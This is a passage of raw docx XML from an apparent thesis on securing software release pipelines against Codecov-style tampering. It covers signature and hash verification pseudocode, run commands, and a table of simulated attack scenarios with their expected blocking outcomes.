          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>env = load_envelope(manifest_path); m = env["manifest"]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>key_meta = trust.keys.get(m["key_id"])                          # signer authorised?</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public_key = load_public_key_pem(key_meta["public_key"])</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>verify(public_key, CTX_MANIFEST, canonical_json(m), env["signatures"][0]["sig"])  # manifest signature</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>actual = sha256_bytes(data); digests_equal(actual, m["sha256"])                  # SHA-256</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>verify(public_key, CTX_ARTIFACT, data, m["artifact_signature"])                   # artifact signature</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>trust.is_artifact_revoked(...); parse_version(v) &lt; parse_version(min_v)            # replay / revocation</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>provenance checks; policy checks; content scan  -&gt;  DEPLOY only if every check passed</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>How to run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (after </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>pip install -r requirements.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>):</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7"/>
        </w:rPr>
        <w:t>python demo.py                          # 14-step live demonstration</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python -m attack_simulation.run_all     # all attack scenarios</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python -m pytest -v                     # 25 automated tests</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python -m tests.generate_test_report    # test table + benchmark (FAR, timing)</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>python -m ci.security_gate verify --artifact A --manifest A.manifest.json   # exit 0 = DEPLOY, 1 = BLOCK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.13 Attack Simulation Design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">All attacks run locally in isolated temporary workspaces. The injected exfiltration line uses the reserved </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>.invalid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain (RFC 2606), which can never resolve, and the tampered script is only hashed and verified, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>never executed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>. No Codecov or third-party system is contacted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Attack scenarios</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="3742"/>
        <w:gridCol w:w="3288"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Scenario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attacker action</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Expected outcome</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1 Legitimate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>None: build → hash → sign → verify</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS → DEPLOY</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2 Tampered artifact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Add the Codecov-style line after signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HASH_MISMATCH + INVALID_SIGNATURE → BLOCK</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2b Forged manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Also replace the SHA-256 in the manifest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE → BLOCK</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3a Unauthorised key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Re-sign with the attacker's own Ed25519 key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_KEY → BLOCK</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3b Impersonation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Claim the vendor key_id, sign with another key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_SIGNATURE → BLOCK</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3c Stolen key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Sign the malicious script with the real (stolen) key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>POLICY_VIOLATION (content scan); after revocation REVOKED → BLOCK</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3d/3e Unauthorised signer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Developer or wrong MFA code asks for a signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>UNAUTHORIZED_SIGNER → denied</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4 Replay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Serve an old or revoked version with its valid signature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>REVOKED / REPLAY_BLOCKED → BLOCK</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5 Registry compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Edit the trust policy to trust the attacker's key</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>INVALID_TRUST_POLICY → BLOCK</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>6 Restore</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3742"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Legitimate new release</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PASS → DEPLOY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pageBreakBefore/>
        <w:spacing w:after="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CHAPTER 6</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>SECURITY ANALYSIS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1 How the Design Withstands the Original Attack Vector</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 6.1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Replaying the Codecov attack against the design</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2608"/>
        <w:gridCol w:w="6350"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stage of the Codecov attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>What happens with the proposed system</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Credential leaked from Docker image</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Storage credentials do not grant release authority. Signing needs the signing service, the release-manager role, TOTP MFA and a key that never leaves the service (HSM/KMS). Keys and secrets are excluded from images (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>, runtime workspace).</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Uploader modified in cloud storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>The modified bytes no longer match the signed SHA-256, and the detached Ed25519 artifact signature fails: HASH_MISMATCH + INVALID_SIGNATURE.</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Attacker also replaces the checksum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6350"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
